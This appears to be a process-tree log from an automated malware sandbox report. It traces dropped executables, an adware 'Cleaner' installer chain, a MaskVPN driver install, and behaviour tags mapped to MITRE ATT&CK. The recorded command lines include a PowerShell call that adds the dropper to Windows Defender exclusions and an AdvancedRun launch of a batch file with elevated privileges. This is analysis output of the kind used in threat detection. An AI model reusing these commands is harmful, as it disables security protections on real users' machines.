- Process spawned unexpected child process
PID:5672
-
C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"1⤵
- Executes dropped EXE
PID:5636
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 576 -p 556 -ip 5561⤵PID:3724
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 652 -p 6136 -ip 61361⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:132
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 628 -p 1232 -ip 12321⤵PID:6320
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 656 -p 5080 -ip 50801⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:6716
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 552 -p 2860 -ip 28601⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:3056
-
C:\Users\Admin\AppData\Local\Temp\DBBB.exeC:\Users\Admin\AppData\Local\Temp\DBBB.exe1⤵
- Suspicious use of SetWindowsHookEx
PID:6424
-
C:\Windows\system32\msiexec.exeC:\Windows\system32\msiexec.exe /V1⤵
- Enumerates connected drives
- Drops file in Windows directory
PID:1180 -
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding CEE661189D1994CF441DB387AD27FE9D C2⤵
- Loads dropped DLL
PID:6684
-
-
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding D0246565CDBD27ABDB993BB10F020EB8 C2⤵
- Loads dropped DLL
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1468
-
-
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding 904973B7433DE4D5BA4868F0C63FEF0A C2⤵
- Loads dropped DLL
PID:6360
-
-
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding 9DF859A6E576B381A284AED6518693752⤵
- Blocklisted process makes network request
- Loads dropped DLL
PID:5428
-
-
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding EC8233E165996061EEF163F8BC996747 C2⤵
- Loads dropped DLL
PID:3252
-
-
C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner\prerequisites\aipackagechainer.exe"C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner\prerequisites\aipackagechainer.exe"2⤵
- Adds Run key to start application
PID:2472 -
C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner\prerequisites\RequiredApplication_1\Cleaner_Installation.exe"C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner\prerequisites\RequiredApplication_1\Cleaner_Installation.exe" -silent=1 -CID=717 -SID=717 -submn=default3⤵
- Adds Run key to start application
PID:4016 -
C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe"C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" "--anbfs"4⤵
- Checks processor information in registry
- Enumerates system info in registry
PID:3268 -
C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exeC:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Cleaner\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Cleaner\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Cleaner\User Data" --annotation=plat=Win64 --annotation=prod=Cleaner --annotation=ver=0.0.13 --initial-client-data=0x204,0x208,0x20c,0x1c0,0x210,0x7fff033edec0,0x7fff033eded0,0x7fff033edee05⤵PID:5108
-
-
C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe"C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1564,171429029934980454,8613705570846959396,131072 --lang=en-US --service-sandbox-type=network --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw3268_1538553479" --mojo-platform-channel-handle=1752 /prefetch:85⤵PID:3212
-
-
C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe"C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=gpu-process --field-trial-handle=1564,171429029934980454,8613705570846959396,131072 --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw3268_1538553479" --start-stack-profiler --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --mojo-platform-channel-handle=1628 /prefetch:25⤵PID:3216
-
-
C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe"C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1564,171429029934980454,8613705570846959396,131072 --lang=en-US --service-sandbox-type=utility --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw3268_1538553479" --mojo-platform-channel-handle=2176 /prefetch:85⤵PID:3944
-
-
C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe"C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=renderer --no-sandbox --file-url-path-alias="/gen=C:\Users\Admin\AppData\Roaming\Cleaner\gen" --js-flags=--expose-gc --no-zygote --register-pepper-plugins=widevinecdmadapter.dll;application/x-ppapi-widevine-cdm --field-trial-handle=1564,171429029934980454,8613705570846959396,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw3268_1538553479" --nwjs --extension-process --ppapi-flash-path=pepflashplayer.dll --ppapi-flash-version=32.0.0.223 --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --mojo-platform-channel-handle=2416 /prefetch:15⤵PID:5652
-
-
C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe"C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=renderer --no-sandbox --file-url-path-alias="/gen=C:\Users\Admin\AppData\Roaming\Cleaner\gen" --js-flags=--expose-gc --no-zygote --register-pepper-plugins=widevinecdmadapter.dll;application/x-ppapi-widevine-cdm --field-trial-handle=1564,171429029934980454,8613705570846959396,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw3268_1538553479" --nwjs --extension-process --ppapi-flash-path=pepflashplayer.dll --ppapi-flash-version=32.0.0.223 --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --mojo-platform-channel-handle=2712 /prefetch:15⤵PID:496
-
-
C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe"C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=gpu-process --field-trial-handle=1564,171429029934980454,8613705570846959396,131072 --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw3268_1538553479" --start-stack-profiler --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=3184 /prefetch:25⤵
- Loads dropped DLL
- Modifies registry class
- Suspicious use of FindShellTrayWindow
PID:5116
-
-
C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe"C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1564,171429029934980454,8613705570846959396,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw3268_1538553479" --mojo-platform-channel-handle=3240 /prefetch:85⤵PID:6064
-
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe" -NonInteractive -NoLogo -ExecutionPolicy AllSigned -Command "C:\Users\Admin\AppData\Local\Temp\AI_D411.ps1 -paths 'C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner\prerequisites\file_deleter.ps1','C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner\prerequisites\aipackagechainer.exe','C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner\prerequisites' -retry_count 10"3⤵
- Blocklisted process makes network request
PID:1844
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 580 -p 5644 -ip 56441⤵PID:3504
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 660 -p 2144 -ip 21441⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:1712
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 596 -p 6132 -ip 61321⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:1584
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 664 -p 6048 -ip 60481⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:7112
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 660 -p 5320 -ip 53201⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:1732
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 552 -p 2372 -ip 23721⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:1560
-
C:\Users\Admin\AppData\Local\Temp\5D11.exeC:\Users\Admin\AppData\Local\Temp\5D11.exe1⤵
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:7016
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 540 -p 1352 -ip 13521⤵PID:6428
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 460 -p 5336 -ip 53361⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:2888
-
C:\Users\Admin\AppData\Local\Temp\706B.exeC:\Users\Admin\AppData\Local\Temp\706B.exe1⤵PID:680
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 680 -s 2882⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
PID:4516
-
-
C:\Users\Admin\AppData\Local\Temp\7F70.exeC:\Users\Admin\AppData\Local\Temp\7F70.exe1⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:6428 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6428 -s 2282⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
PID:5812
-
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 608 -p 6640 -ip 66401⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:6520
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 540 -p 1176 -ip 11761⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:2108
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 624 -p 680 -ip 6801⤵PID:5812
-
C:\Users\Admin\AppData\Local\Temp\CED9.exeC:\Users\Admin\AppData\Local\Temp\CED9.exe1⤵PID:5676
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 472 -p 6428 -ip 64281⤵PID:2120
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 460 -p 3960 -ip 39601⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:6184
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 612 -p 6044 -ip 60441⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:5288
-
C:\Users\Admin\AppData\Local\Temp\18F3.exeC:\Users\Admin\AppData\Local\Temp\18F3.exe1⤵
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:6508 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV12⤵
- Executes dropped EXE
PID:720
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc1⤵
- Modifies data under HKEY_USERS
PID:1324
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵
- Loads dropped DLL
- Enumerates connected drives
- Suspicious use of FindShellTrayWindow
PID:816
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch -p -s DeviceInstall1⤵
- Drops file in Windows directory
- Checks SCSI registry key(s)
PID:5592 -
C:\Windows\system32\DrvInst.exeDrvInst.exe "4" "0" "C:\Users\Admin\AppData\Local\Temp\{49789639-54bd-064f-9992-38795632480d}\oemvista.inf" "9" "4d14a44ff" "0000000000000148" "WinSta0\Default" "0000000000000158" "208" "c:\program files (x86)\maskvpn\driver\win764"2⤵
- Drops file in System32 directory
- Drops file in Windows directory
- Checks SCSI registry key(s)
- Modifies data under HKEY_USERS
PID:5992
-
-
C:\Windows\system32\DrvInst.exeDrvInst.exe "2" "211" "ROOT\NET\0000" "C:\Windows\INF\oem2.inf" "oem2.inf:3beb73aff103cc24:tap0901.ndi:9.0.0.21:tap0901," "4d14a44ff" "000000000000015C" "1e87"2⤵
- Drops file in Drivers directory
- Drops file in Windows directory
- Checks SCSI registry key(s)
PID:6908
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s DsmSvc1⤵
- Checks SCSI registry key(s)
- Modifies data under HKEY_USERS
PID:2604
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s NetSetupSvc1⤵PID:5372
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo1⤵PID:6748
-
C:\Users\Admin\AppData\Local\Temp\9DC4.exeC:\Users\Admin\AppData\Local\Temp\9DC4.exe1⤵
- Windows security modification
- Suspicious use of SetThreadContext
PID:6172 -
C:\Users\Admin\AppData\Local\Temp\0ce6ab0a-ea83-4b83-9832-5c31ace5a8c4\AdvancedRun.exe"C:\Users\Admin\AppData\Local\Temp\0ce6ab0a-ea83-4b83-9832-5c31ace5a8c4\AdvancedRun.exe" /EXEFilename "C:\Users\Admin\AppData\Local\Temp\0ce6ab0a-ea83-4b83-9832-5c31ace5a8c4\test.bat" /WindowState ""0"" /PriorityClass ""32"" /CommandLine "" /StartDirectory "" /RunAs 8 /Run2⤵PID:1204
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\0ce6ab0a-ea83-4b83-9832-5c31ace5a8c4\test.bat"3⤵PID:6128
-
-
-
C:\Users\Admin\AppData\Local\Temp\9DC4.exeC:\Users\Admin\AppData\Local\Temp\9DC4.exe2⤵PID:5604
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\9DC4.exe" -Force2⤵PID:4488
-
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe1⤵PID:7040
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 7040 -s 8802⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
PID:1464
-
-
C:\Windows\explorer.exeC:\Windows\explorer.exe1⤵PID:1520
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 680 -p 7040 -ip 70401⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:6856
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe1⤵PID:5052
-
C:\Windows\explorer.exeC:\Windows\explorer.exe1⤵
- Suspicious behavior: MapViewOfSection
PID:5564
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe1⤵PID:3180
-
C:\Windows\explorer.exeC:\Windows\explorer.exe1⤵PID:3092
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe1⤵PID:6116
-
C:\Windows\explorer.exeC:\Windows\explorer.exe1⤵PID:6936
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe1⤵PID:4192
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s seclogon1⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
PID:580
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s BITS1⤵PID:2124
-
C:\Program Files (x86)\MaskVPN\mask_svc.exe"C:\Program Files (x86)\MaskVPN\mask_svc.exe"1⤵
- Loads dropped DLL
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Modifies data under HKEY_USERS
PID:6628 -
C:\Program Files (x86)\MaskVPN\MaskVPNUpdate.exeMaskVPNUpdate.exe /silent2⤵
- Loads dropped DLL
- Drops file in Program Files directory
- Suspicious use of SetWindowsHookEx
PID:6860
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 576 -p 4072 -ip 40721⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
- Executes dropped EXE
- Loads dropped DLL
PID:5468
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 460 -p 5976 -ip 59761⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:2868
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 588 -p 5976 -ip 59761⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:5380
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 524 -p 6072 -ip 60721⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:3128
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 492 -p 5976 -ip 59761⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:5940
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}1⤵PID:3908
-
C:\Windows\system32\compattelrunner.exeC:\Windows\system32\compattelrunner.exe -m:aeinv.dll -f:UpdateSoftwareInventoryW1⤵
- Checks processor information in registry
- Enumerates system info in registry
PID:3880
Network
MITRE ATT&CK Enterprise v6
Defense Evasion
Disabling Security Tools
4Install Root Certificate
1Modify Registry
6Virtualization/Sandbox Evasion
1Web Service
1